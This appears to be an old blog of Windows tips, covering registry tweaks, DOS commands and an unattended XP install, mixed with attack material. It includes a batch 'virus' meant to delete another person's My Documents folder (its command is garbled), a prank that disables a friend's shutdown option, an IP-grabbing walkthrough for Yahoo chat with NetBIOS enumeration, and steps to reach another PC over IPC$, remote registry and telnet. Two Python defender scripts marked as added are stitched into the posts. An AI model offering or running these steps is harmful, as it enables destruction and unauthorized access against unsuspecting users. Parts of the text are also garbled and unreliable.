COMPUTER TIPS AND TRICKS!

Tuesday, February 5, 2008

to convert FAT partition to NTFS!!!

To convert a FAT partition to NTFS:

Click Start, click Programs, and then click Command Prompt.
In Windows XP, click Start, click Run, type cmd and then click OK.
At the command prompt, type CONVERT [driveletter]: /FS:NTFS.
Convert.exe will attempt to convert the partition to NTFS.
NOTE: Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that is to be converted prior to executing the convert command. It is also recommended to verify the integrity of the backup before proceeding, as well as to run RDISK and update the emergency repair disk (ERD).

creating a VIRUS!!

HERE'S A WAY I FOUND TO DELETE THE MY DOCUMENTS FOLDER OF UR ENEMY OR JUST 4 FUN.HERE'S WHAT U SHOULD DO.


OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A BAT FILE.I MEAN SAVE IT LIKE MYVIRUS.BAT.IT SHOULD HAVE THE ENDING AS .BAT.NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.


rmdir C:\Documents and Settings \S\Q.

SET the SEARCH screen to the classic look!!!

When I first saw the default search pane in Windows XP, my instinct was to return
it to its classic look; that puppy had to go. Of course, I later discovered that a
doggie door is built into the applet. Click "Change preferences" then "Without an
animated screen character." If you'd rather give it a bare-bones "Windows 2000" look
and feel, fire up your Registry editor and navigate to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState

You may need to create a new string value labeled "Use Search Asst" and set it to "no".




How to make your Desktop Icons Transparent


Go to Control Panel > System > Advanced > Performance area > Settings button > Visual Effects
tab > "Use drop shadows for icon labels on the Desktop"





Remove the Recycle Bin from the Desktop

If you don't use the Recycle Bin to store deleted files,
you can get rid of its desktop icon altogether.

Run Regedit and go to:


HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/explorer/Desktop/NameSpace


Click on the "Recycle Bin" string in the right hand pane. Hit Del, click OK.




How to Rename the Recycle Bin

To change the name of the Recycle Bin desktop icon, open Regedit and go to:

HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}

and change the name "Recycle Bin" to whatever you want (don't type any quotes).

DOS tricks!!

Here are two additional switches that can be used when doing a DIR:

1. /B - Shows only the long filename, no details
2. /Z - Shows the short filename, with details
3. /B /Z - Shows only short filename, with no details


DOS Command History


If you use DOSKEY in either your AUTOEXEC.BAT file or as part of the properties of your
you can show and recall the history of commands you enter at the DOS prompt.

* To recall previous commands, use the up arrow key.
* A complete list of previous commands can be shown if you press the F7 key
* To use one, press F9 and the number of the command you want to use
* To clear the cache, press Alt+F7


Changing a File's Date and Time Stamp


You can change the Date and Time stamp of a file to the current setting.
Type:
COPY filename /B + ,, /Y

Removing the Microsoft Copyright from a DOS Prompt

By default, when you open a DOS window, the Microsoft Copyright notice shows.
To disable it, add the /K switch in the Program tab
For example: C:\WINDOWS\COMMAND.COM /k

Setting the Number of Lines in a DOS Window

To set the number of lines displayed when you open up a DOS window:

1. Create a shortcut for the MS-DOS Prompt
2. Right click on it
3. Select Properties
4. Click on the Program tab
5. In the Batch file: line, enter mode con: lines=xx (where xx is the number of lines you want displayed)
6. Valid numbers for xx are 25 or 43

Submitted by John Karwoski

Starting DOS Fast
Want to start DOS fast outside of the START button? Drag it to your desktop.
Want to start it even FASTER without the mouse?

1. Change the shortcut properties of the DOS icon to something unique, like Ctrl-Alt-Z.
2. Then to start DOS from within Win95/98?/NT just enter C-A-Z and poof! it's there.
3. If you toggle away, and hit the shortcut sequence again, you'll get the "old" DOS box, not a new one.


Long Filenames in a DOS Box


More long filenames in DOS paths...
You don't need the close double quote when entering long folder names in DOS.

CD "\program files
works as well as
CD "\program files"

You can use long file names in a MS DOS Box.
All you have to do is put the long file name in quotes.
Example: cd "program files"

Expanding Full Path or File Name

NT 4.0 Only


Expand full path/file name with defined char using Command Prompt in Win NT 4.0
You can expand the full name of a file or directory using a character of your choice.

1. Close all Command Prompts
2. Start the Registry Editor
3. Open HKEY_CURRENT_USER\Software\Microsoft\Command Processor
4. If not present, add Key: CompletionChar
5. If you like to use TAB-Key for expand: set value (REG_SZ): "9"

You can test it:

1. Open up a DOS window
2. Type: CD (followed by TAB)
3. The first available directory will appear
4. Press TAB again, the next one will appear
5. The same can be done with the DIR command


Adding DOSKEY to your DOS Window


One way to have DOSKEY available when you open a DOS window would be to have it in the AUTOEXEC.BAT file.
This takes away conventional memory, even when you don't have a DOS window open.
To only use DOSKEY when you open a DOS window:

* Right click on your DOS shortcut
* Select Properties
* Click on the Program tab
* Add DOSKEY > NUL to the Batch File field
* You can also add /INSERT if you prefer


Showing DOS Error Codes


If you want to see what error codes are being generated by DOS programs,
start your DOS session with the addition of a /Z parameter to the COMMAND.COM program.

Changing Directories in DOS


Normally, you can move up one directory level by typing CD ..
The DOS with Windows95 allows you to continue moving up beyond the first directory by simply adding more periods
For example, to move up two levels, type CD ...


Entering Long Paths in a DOS Window

If you have to enter a long path and program name in a DOS window,

1. Open up the Explorer
2. Go to the folder you want
3. Drag it to the DOS window
4. The path will be inserted into the window

This can come in useful with the long path names and all the ~'s you would normally need to type.
If you need to change directories, type in the CD before you drag the directory.


Having DOS Programs Prompt for Input


When you normally create a shortcut for a DOS program, it does not prompt you for any input and just runs the program
To change that, simply add a ? after the program name in the CMD field.
For example:
C:\WINDOWS\COMMAND\EDIT.COM ?
will start the DOS editor and prompt you for a file name to edit.


Verbose Directory Listing

To see your free memory and other useful info in detail:

1. Open a DOS box
2. Go to the directory that you want to get specific info about, or if you just want to see memory info go to any directory (I use the root).
3. Type DIR /V
4. The /v argument stands for "verbose".
5. All sorts of good information comes up.



Easy way to open up DOS prompt in a specific directory


With the advent of long directory names, it can be difficult to open up a DOS box and CD to the directory you want
particularly if it is several layers of long names deep.
An easy way is to:

1. Open up Explorer and highlight the directory you want to be in
2. Select Run / Command from the Start Menu
3. Your DOS prompt will now be in the directory you highlighted in Explorer

AUTOMATING the installation of XP!!!

You can create a CD that can install Windows XP automatically, putting in all the details and answering all the dialog boxes.

The secret behind this is the answer file, which tells Windows what to do while it's installing. The answer file can be created using Windows setup manager.

Using this tool, you can make the answer file so powerful that you can even tell Windows to include or exclude individual components, set the display resolution, and more.

Here are the steps involved in creating an XP Automated Installation Disc:

Step 1: To begin with, insert your Windows XP installation CD into the drive and copy the entire contents of the CD to a new folder on your hard disk.

Step 2: Navigate to the Support > Tools folder on the CD and double-click the Deploy.cab file. Copy all the files to a new folder on your hard disk.

Step 3: The crucial part begins now, creating the answer file. To execute the windows setup manager, double click the Setupmgr.exe file from the contents of the Deploy.cab, which you just copied onto the hard drive.

Step 4: The first few steps of the wizard are self explanatory. Select the following options from the successive dialog boxes. Create a new answer file; Windows unattended installation (Select the appropriate Windows version); "Fully automated"; "No this answer file will be used to install from CD"; and finally, accept the license agreement.

Step 5: Under the General Settings, you can customize the installation of Windows by providing the default name and organization, display settings, time zone and the product key. Fill in the fields using the drop-down list or by keying in the details. If you don't select an option from the drop-down list, the default values will be used.

Step 6: After you are done click Finish and save the answer file as "winnt.sif" when you are prompted. Advanced users can further tweak the answer file by referring to the Help file called Ref.chm in the same folder.

Step 7: Finally copy the answer file to i386 folder in the Windows XP installation folder you created in the beginning.

Step 8: To burn a bootable installation disc, you need the boot sector of the Windows XP CD. Download it from here bootfiles.zip

Step 9: Launch Nero and select CD-ROM (Boot) from the New Compilation dialog box. Under the Boot tab, specify the boot sector file you downloaded and extracted. Set the emulation as "No emulation", and keep the boot message blank. Most importantly, remember to set the "Number of loaded sectors" as 4.

Step 10: Under the Burn tab, set the write method to disc at-once. Click the New button to begin adding files and folders to the compilation. Drag all the contents of the Windows XP installation disc that you copied to your hard drive (with the answer file in the i386 folder) into the left pane. Insert a blank CD into the optical drive and hit the burn button. Your Windows automated installation disc is ready! :)

how to fix corrupted files of XP!!!

Required:

1. Windows XP operating system
2. Windows XP cd

Now, follow these steps:

1. Place the xp cd in your cd/dvd drive
2. Go to start
3. run
4. type in 'sfc /scannow' (without the ')

Now it should all load, and fix all your corrupted files on Win XP.

remove the shutdown option!!

Wanna play with your friends by removing the shutdown option from the Start menu on their computer?
Just hack it down !!!

Click on start>run(win key+r)

Then type "regedit" there, this opens up the registry editor, now go to

HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Explorer

Then set "NoClose"="DWORD:1"

how to clone a HARDDRIVE!!!

Did you know that you could clone your current Hard Drive without having to buy extra software? Maybe you didn't know that all that you needed was already set up on your current system? Well, it is... and if you follow this tut, you shouldn't have much of a problem.


Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.

First: Perform a Scandisk on your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.

Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.

Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.

Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".

Fifth: In this final part, you might want to cut-and-paste the code in, unless you are sure that you can do it without making any mistakes:

Click on the "Start" button, then click on the "Run..." button, then place the following into the Runbox:

"XCOPY C:\*.* D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.

If you receive an error message, then remove the space from between XCOPY and C:\

Anything that should happen to come up in the DOS box, just click "Y" for "Yes". When it's all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.

This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn't have any problems. If, by any chance, you should come across a snag, message me and I'll walk you through it.

common scrap anyone without any ads!!(orkut)

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://userscripts.org/scripts/source/11850.user.js';void(0)

Saturday, February 2, 2008

hacking PC while chatting!!

I am not sure that this will work 100%.
But yes, it will work almost 70 percent of the time.
But before that you need to know a few things about the Yahoo chat protocol.
Leave a comment here after you see the post and let me know whether it works or not; if you are having a problem, post here.

Following are the features:

1) When we chat on Yahoo, everything goes through the server. That is only when we chat, i.e. for messages.
2) When we send files, Yahoo has 2 options:
a) Either it uploads the file and then the other client has to download it,
b) or it connects to the client directly and gets the files.
3) When we use video or audio:
a) It either goes through the server,
b) or it has a client-to-client connection.

And when we have a client-to-client connection, the opponent's IP is revealed, on the 5051 port. So how do we exploit the chat user when he gets a direct connection? And how do we go about it? Remember, I am here to hack a system without using a TOOL, only by simple net commands and Yahoo chat techniques. That's what makes the difference between a real hacker and newbies.

So let's analyse:
1) It's impossible to get an attacker's IP address when you only chat.
2) There is a 50% chance of getting an IP address when you send files.
3) Again, a 50% chance of getting the IP when you use video or audio.

So why wait? Let's exploit those 50% chances.
I'll explain only for files here; the same applies to video or audio.

1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

I will just explain what the output is in general. On the left-hand side is your IP address, and on the right-hand side is the IP address of the foreign machine and the port to which it is connected. OK, so what next?

2) Try sending a file to the target.
If the file comes from the server, that is, the file is uploaded, leave it. You will not get the IP. But if a direct connection is established,
HMMMM, then the attacker's first phase is over.
This is the output in your netstat. The 5101 number port is where the attacker is connected.
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED


3) So what next???
Hmmm........ Ok so make a DOS attack now
Go to the DOS prompt and
just do
nbtstat -A Attackers IPaddress. It can happen that if the system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14

Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1E> GROUP Registered

MAC Address = 00-C0-W0-D5-EF-9A

What to do next??
It is now ur job to tell me what u have done next...


So the conclusion is: never exchange files, video or audio until you know that the user with whom you are chatting is not going to harm you.
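
A defender's view of the netstat listings above, as an added example that is not part of the original post: this Python script splits repeated `netstat -n 3` output into snapshots and reports when a direct peer connection appears, which is the moment your own address becomes visible to the other party. The sample text is constructed from the listings in the post, and the port sets (5050 relayed, 5101 direct) are assumptions taken from those listings.

```python
"""Report direct peer connections appearing in repeated `netstat -n 3` output."""
from typing import NamedTuple

RELAY_PORTS = {5050}   # assumption: remote port of the chat server in the post
DIRECT_PORTS = {5101}  # assumption: port the post shows for the direct transfer

# Constructed sample: two identical snapshots, then one with a direct connection.
BASE = (
    "Active Connections\n\n"
    "Proto Local Address Foreign Address State\n"
    "TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED\n"
    "TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED\n"
    "TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED\n"
    "TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED\n"
)
SAMPLE = (BASE + "\n" + BASE + "\n" + BASE
          + "TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED\n")


class Conn(NamedTuple):
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int
    state: str


def _endpoint(text):
    """Split 'ip:port' (or '[ipv6]:port') into (ip, port)."""
    host, _, port = text.rpartition(":")
    return host.strip("[]"), int(port)


def parse_snapshots(output):
    """Return one set of Conn per 'Active Connections' block."""
    snapshots, current = [], None
    for line in output.splitlines():
        fields = line.split()
        if fields[:2] == ["Active", "Connections"]:
            current = set()
            snapshots.append(current)
        elif current is not None and len(fields) == 4 and fields[0] == "TCP":
            try:
                local, remote = _endpoint(fields[1]), _endpoint(fields[2])
            except ValueError:
                continue  # malformed row, skip it
            current.add(Conn(*local, *remote, fields[3]))
    return snapshots


def classify(conn):
    """Label a connection as relayed through the server, direct to a peer, or other."""
    if conn.local_port in DIRECT_PORTS or conn.remote_port in DIRECT_PORTS:
        return "direct-peer"
    if conn.remote_port in RELAY_PORTS:
        return "relayed"
    return "other"


def direct_peer_events(output):
    """List (snapshot_index, Conn) for each newly established direct connection."""
    events, previous = [], set()
    for index, snapshot in enumerate(parse_snapshots(output)):
        for conn in sorted(snapshot - previous):
            if conn.state == "ESTABLISHED" and classify(conn) == "direct-peer":
                events.append((index, conn))
        previous = snapshot
    return events


if __name__ == "__main__":
    for index, conn in direct_peer_events(SAMPLE):
        print("snapshot %d: direct connection with %s (local port %d)"
              % (index, conn.remote_ip, conn.local_port))
```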

changing title of MEDIA player!!

You can change the title bar for the Windows Media Player
1. Start Regedit
2. Go to HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer (create a new key named WindowsMediaPlayer if it's not there)
3. Create a string value of TitleBar
4. Give it a value of whatever you want to appear in the title bar

hack IE!!

This is not a big trick
Just for timepass

Go to start->run
Type regedit
press enter
in registry editor go to
HKEY_CURRENT_USER->Software->Microsoft->Internet explorer->main
there u will find something like "windows title"
double click on that and change the value data with anything u want
and click ok
press F5
restart ur internet explorer
see the title of it

increase ur browsing speed!!

Speed up your firefox browser and load pages about 20% faster than previous.

1. Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:

network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests

Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.

2. Alter the entries as follows:

Set "network.http.pipelining" to "true"

Set "network.http.proxy.pipelining" to "true"

Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.

3. Lastly, right-click anywhere and select New -> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it receives.

If you're using a broadband connection you'll load pages 2-3 times faster now.


remote access method!!

Just Control Another Computer Remotely.

Things You Need
The remote PC's account username and password


<-- Method -->

1. Go to the Command Prompt (press Windows+R and type cmd).
2. Type cd\ (to go to the main root of C:).
3. Type the command
c:\net use \\(remote PC's username, i.e. Adrian)\ipc$ /u:Administrator
c:\net use \\Adrian\ipc$ /u:Administrator (press Enter)
(Results of the above command)
The Password Or Username Is Invalid For \\Adrian\ipc$.
Enter The PassWord For "Administrator" tp connect to 'Adrian':*****
The Command COmpleted Successfuly.
4. Press Windows+R and type regedit to enter the Registry Editor.
5. Press Alt+F, then C.
6. Type in the "Object's Name": Adrian (the computer's username), then press Enter.
(The new computer's registry is successfully accessed.)
7. Just go to
Adrian\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\TelnetServer\1.0
On the right-hand side, double-click the key named "NTLM" (a new box appears).
Value Name: NTLM
Value Data: (replace 2 with 0)
Base: Hexadecimal
Press OK.
Get out of the Registry Editor.
8. Again press Windows+R and type mmc. (Console1 will open.)
9. Press Alt+F, then M (a new window will appear).
10. Press Alt+D, then double-click "Computer Management".
11. Select "Another computer" and type its account login (Adrian).
12. Press Finish and then close the "Add Standalone Snap-in" dialog box.
13. Now press OK in "Add/Remove Snap-in".
14. On the left-hand side, expand Computer Management > Services and Applications > Services.
15. On the right-hand side, scroll down, right-click "Telnet" and select the Restart option.
16. Leave it as it is.
17. Return to the Command Prompt and type
c:\telnet Adrian (press Enter)
It will require a login and password
Login:Administrator
PassWord:********(Enter)
*-----------------------------------------------------------
Welcome TO Microsoft Telnet SErver
C:dir(Enter)

Thats It!
Enjoy With Kenreaves!!!

DOS hacking

**************************************************
In this Guide you will learn how to:
* Use telnet from Windows
* Download web pages via telnet
* Get finger information via telnet
* Telnet from the DOS command-line
* Use netcat
* Break into Windows Computers from the Internet
Protecting Yourself
What can they do
The command-line approach
The GUI approach
Final Words
**************************************************

How to Use Telnet on a Windows Computer

Telnet is a great little program for doing a couple of interesting things. In fact, if you want to call yourself a hacker, you absolutely MUST be able to telnet! In this lesson you will find out a few of the cool things a hacker can do with telnet.

If you are using Win95, you can find telnet in the c:\windows directory, and on NT, in the c:\winnt\system32 directory. There isn't a lot of online help concerning the usage of the program, so my goal is to provide some information for new users.

First off, telnet isn't so much an application as it is a protocol. Telnet is a protocol that runs over TCP/IP, and was used for connecting to remote computers. It provides a login interface, and you can run command-line programs by typing the commands on your keyboard, and the programs use the resources of the remote machine. The results are displayed in the terminal window on your machine, but the memory and CPU cycles consumed by the program are located on the remote machine. Therefore, telnet functions as a terminal emulation program, emulating a terminal on the remote machine.

Now, telnet runs on your Win95 box as a GUI application...that is to say that you can type "telnet" at the command prompt (in Windows 95 this is the MS-DOS prompt), and assuming that your PATH is set correctly, a window titled "telnet" will open. This differs from your ftp program in that all commands are entered in the DOS window.

Let's begin by opening telnet.
Simply open a DOS window by clicking "start", then "programs", then "MS-DOS", and at the command prompt, type:

c:\telnet

The window for telnet will open, and you can browse the features of the program from the menu bar.

**************************************************
NEWBIE NOTE: In this text file, I am referring only to the telnet program that ships with Win95/NT. If you type "telnet" at the command prompt and you don't get the telnet window, make sure that the program is on your hard drive using the Start -> Find -> Files or Folders command. Also make sure that your path statement includes the Windows directory. There are many other programs available that provide similar functionality, with a lot of other bells and whistles, from any number of software sites.
**************************************************

To learn a bit more about telnet, choose Help -> Contents, or Help -> Search for help on... from the menu bar. Read through the files in order to find more detailed explanations of things you may wish to do. For example, in this explanation, I will primarily be covering how to use the application and what it can be used for, but not how to customize the colors for the application.

Now, if you choose Connect -> Remote System, you will be presented with a dialog window that will ask you for the remote host, the port and the terminal type.

**************************************************
NEWBIE NOTE: For most purposes, you can leave the terminal type on VT100.
**************************************************

In the Connect dialog box, you can enter in the host to which you wish to connect, and there is a list box of several ports you can connect to:

daytime: May give you the current time on the server.
echo: May echo back whatever you type in, and will tell you that the computer you have connected to is alive and running on the Internet.
qotd: May provide you with a quote of the day.
chargen: May display a continuous stream of characters, useful for spotting network problems, but may crash your telnet program.
telnet: May present you with a login screen.

These will only work if the server to which you are trying to connect is running these services. However, you are not limited to just those ports...you can type in any port number you wish. (For more on fun ports, see the GTMHH, "Port Surf's Up.") You will only successfully connect to the port if the service in question is available. What occurs after you connect depends upon the protocol for that particular service. When you are using telnet to connect to the telnet service on a server, you will (in most cases) be presented with a banner and a login prompt.

[Note from Carolyn Meinel: Many people have written saying their telnet program fails to connect no matter what host they try to reach. Here's a way to fix your problem. First -- make sure you are already connected to the Internet. If your telnet program still cannot connect to anything, here's how to fix your problem. Click "start" then "settings" then "control panel." Then click "Internet" then "connection." This screen will have two boxes that may or may not be checked. The top one says "connect to the Internet as needed." If that box is checked, uncheck it -- but only uncheck it if you already have been having problems connecting. The bottom box says "connect through a proxy server." If that box is checked, you probably are on a local area network and your systems administrator doesn't allow you to use telnet.]

**************************************************
NEWBIE NOTE: It's not a good idea to connect to a host on which you don't have a valid account. In your attempts to guess a username and password, all you will do is fill the log files on that host. From there, you can very easily be traced, and your online service provider will probably cancel your account.
**************************************************

Now, you can also use telnet to connect to other ports, such as ftp (21), smtp (25), pop3 (110), and even http (80). When you connect to ftp, smtp, and pop3, you will be presented with a banner, or a line of text that displays some information about the service. This will give you a clue as to the operating system running on the host computer, or it may come right out and tell you what the operating system is...for instance, AIX, Linux, Solaris, or NT.

If you successfully connect to port 80, you will see a blank screen. This indicates, again, that you have successfully completed the TCP negotiation and you have a connection. Now, what you do from there is up to you. You can simply disconnect with the knowledge that, yes, there is a service running on port 80, or you can use your knowledge of the HTTP protocol to retrieve the HTML source for web pages on the server.

How to Download Web Pages Via Telnet

To retrieve a web page for a server using telnet, you need to connect to that server on port 80, generally. Some servers may use a different port number, such as 8080, but most web servers run on port 80.

The first thing you need to do is click on Terminal -> Preferences and make sure that there is a check in the Local Echo box. Then, since most web pages will generally take up more than a single screen, enable logging by clicking Terminal -> Start Logging... and select a location and filename. Keep in mind that as long as logging is on, and the same file is being logged to, all new information will be appended to the file, rather than overwriting the original file. This is useful if you want to record several sessions, and edit out the extraneous information using Notepad.

Now, connect to the remote host, and if your connection is successful, type in:

GET / HTTP/1.0

and hit enter twice.

**************************************************
NEWBIE NOTE: Make sure that you hit enter twice...this is part of the HTTP protocol.
The single / after GET tells the server to return the default index file, which is generally "index.html". However, you can enter other filenames, as well.
**************************************************

You should have seen a bunch of text scroll by on the screen. Now you can open the log file in Notepad, and you will see the HTML code for the page, just as though you had chosen the View Source option from your web browser. You will also get some additional information...the headers for the file will contain some information about the server. For example:

HTTP/1.0 200 Document follows
Date: Thu, 04 Jun 1998 14:46:46 GMT
Server: NCSA/1.5.2
Last-modified: Thu, 19 Feb 1998 17:44:13 GMT
Content-type: text/html
Content-length: 3196

One particularly interesting piece of information is the server name. This refers to the web server software that is running and serving web pages. You may see other names in this field, such as versions of Microsoft IIS, Purveyor, WebSite, etc. This will give you a clue as to the underlying operating system running on the server.

**************************************************
SYSADMIN NOTE: This technique, used in conjunction with a database of exploits on web servers, can be particularly annoying. Make sure you keep up on exploits and the appropriate security patches from your web server and operating system vendors.
**************************************************

**************************************************
NEWBIE NOTE: This technique of gathering web pages is perfectly legal. You aren't attempting to compromise the target system, you are simply doing by hand what your web browser does for you automatically. Of course, this technique will not load images and Java applets for you.
**************************************************

Getting Finger Information Via Telnet

By now, you've probably heard or read a lot about finger.
It doesn't seem like a very useful service, and many sysadmins disable the service because it provides information on a particular user, information an evil hacker can take advantage of. Win95 doesn't ship with a finger client, but NT does. You can download finger clients for Win95 from any number of software sites. But why do that when you have a readily available client in telnet?

The finger daemon or server runs on port 79, so connect to a remote host on that port. If the service is running, you will be presented with a blank screen.

**************************************************
NEWBIE NOTE: NT doesn't ship with a finger daemon (A daemon is a program on the remote computer which waits for people like you to connect to it), so generally speaking, any server that you find running finger will be a Unix box. I say "generally" because there are third-party finger daemons available and someone may want to run one on their NT computer.
**************************************************

The blank screen indicates that the finger daemon is waiting for input. If you have a particular user that you are interested in, type in the username and hit enter. A response will be provided, and the daemon will disconnect the client. If you don't know a particular username, you can start by simply hitting enter. In some cases, you may get a response such as "No one logged on." Or you may get information of all currently logged on users. It all depends on whether or not the sysadmin has chosen to enable certain features of the daemon. You can also try other names, such as "root", "daemon", "ftp", "bin", etc.

Another neat trick to try out is something that I have seen referred to as "finger forwarding". To try this out, you need two hosts that run finger. Connect to the first host, host1.com, and enter the username that you are interested in. Then go to the second host, and enter:

user@host1.com

You should see the same information!
Again, this all depends upon the configuration of the finger daemon.

Using Telnet from the Command Line

Now, if you want to show your friends that you are a "real man" because "real men don't need no stinkin' GUIs", well just open up a DOS window and type:

c:\>telnet

and the program will automatically attempt to connect to the host on the designated port for you.

Using Netcat

Let me start by giving a mighty big thanks to Weld Pond from L0pht for producing the netcat program for Windows NT. To get a copy of this program, which comes with source code, simply go to:

http://www.l0pht.com/~weld

NOTE: The first character of "l0pht" is the letter "l". The second character is a zero, not an "o".

I know that the program is supposed to run on NT, but I have seen it run on Win95. It's a great little program that can be used to do some of the same things as telnet. However, there are advantages to using netcat...for one, it's a command-line program, and it can be included in a batch file. In fact, you can automate multiple calls to netcat in a batch file, saving the results to a text file.

**************************************************
NEWBIE NOTE: For more information on batch files, see previous versions of the Guide To (mostly) Harmless Hacking, Getting Serious with Windows series ...one of them dealt with basic batch file programming.
**************************************************

Before using netcat, take a look at the readme.txt file provided in the zipped archive you downloaded. It goes over the instructions on how to download web pages using netcat, similar to what I described earlier using telnet.

There are two ways to go about getting finger information using netcat. The first is in interactive mode. Simply type:

c:\>nc 79

If the daemon is running, you won't get a command prompt back. If this is the case, type in the username and hit enter. Or use the automatic mode by first creating a text file containing the username of interest.
For example, I typed:

c:\>edit root

and entered the username "root", without the quotes. Then from the command prompt, type:

c:\>nc 79 <>nc 79 <> nc.log

to create the file nc.log, or:

c:\>nc 79 <>> nc.log

to append the response to the end of nc.log.

NOTE: Make sure that you use spaces between the redirection operators.
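The SYSADMIN NOTE above is about what the response headers give away. The following is an added example, not part of the original guide: it parses a raw response saved from your own server and reports which headers name the software and its version. The sample responses are constructed (the first reuses the headers quoted above), and the function names and the list of audited headers are assumptions made for this example.

```python
import re

# Constructed sample: the response head quoted in the guide, as it would land in a log file.
SAMPLE_RESPONSE = (
    "HTTP/1.0 200 Document follows\r\n"
    "Date: Thu, 04 Jun 1998 14:46:46 GMT\r\n"
    "Server: NCSA/1.5.2\r\n"
    "Last-modified: Thu, 19 Feb 1998 17:44:13 GMT\r\n"
    "Content-type: text/html\r\n"
    "Content-length: 3196\r\n"
    "\r\n"
    "<html><head><title>constructed body</title></head></html>\n"
)

# Constructed sample: the same server after its banner was reduced to a bare product name.
SAMPLE_MINIMAL = (
    "HTTP/1.0 200 OK\r\n"
    "Server: httpd\r\n"
    "Content-type: text/html\r\n"
    "\r\n"
)

# Headers audited for software names (assumption: the list chosen for this example).
DISCLOSING_HEADERS = ("server", "x-powered-by")

# A product token is "name" or "name/version", e.g. "NCSA/1.5.2".
PRODUCT_RE = re.compile(r"([A-Za-z][\w.\-]*)(?:/([\w.\-]+))?")


def parse_response_head(raw):
    """Split a raw HTTP response into (version, status, reason, headers)."""
    text = raw.replace("\r\n", "\n")          # logs saved from telnet may use bare LF
    head, _, _body = text.partition("\n\n")   # headers end at the first empty line
    lines = head.split("\n")
    m = re.match(r"HTTP/(\d\.\d)\s+(\d{3})(?:\s+(.*))?$", lines[0].strip())
    if not m:
        raise ValueError("not an HTTP status line: %r" % lines[0])
    headers = {}
    last = None
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and last:  # obsolete folded continuation line
            headers[last][-1] += " " + line.strip()
            continue
        name, sep, value = line.partition(":")
        if not sep:
            continue                          # not a header line, ignore it
        last = name.strip().lower()
        headers.setdefault(last, []).append(value.strip())
    return m.group(1), int(m.group(2)), m.group(3) or "", headers


def banner_findings(raw):
    """Return (header, product, version) for every product token in the audited headers."""
    _, _, _, headers = parse_response_head(raw)
    findings = []
    for name in DISCLOSING_HEADERS:
        for value in headers.get(name, []):
            without_comments = re.sub(r"\([^)]*\)", " ", value)  # drop "(Unix)"-style comments
            for token in without_comments.split():
                pm = PRODUCT_RE.fullmatch(token)
                if pm:
                    findings.append((name, pm.group(1), pm.group(2)))
    return findings


def version_disclosures(raw):
    """Only the findings that reveal a version number, which is what patch-level lookups need."""
    return [f for f in banner_findings(raw) if f[2] is not None]


if __name__ == "__main__":
    for label, raw in (("original", SAMPLE_RESPONSE), ("minimal", SAMPLE_MINIMAL)):
        print(label, banner_findings(raw), "versions:", version_disclosures(raw))
```

Hiding the version does not replace patching, which is the point of the SYSADMIN NOTE; it only removes the easiest clue.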
How to Break into a Windows 95 machine Connected to the Internet

Disclaimer

The intent of this file is NOT to provide a step-by-step guide to accessing a Win95 computer while it is connected to the Internet. The intent is to show you how to protect yourself.

There are no special tools needed to access a remote Win95 machine...everything you need is right there on your Win95 system! Two methods will be described...the command-line approach and the GUI approach.

Protecting Yourself

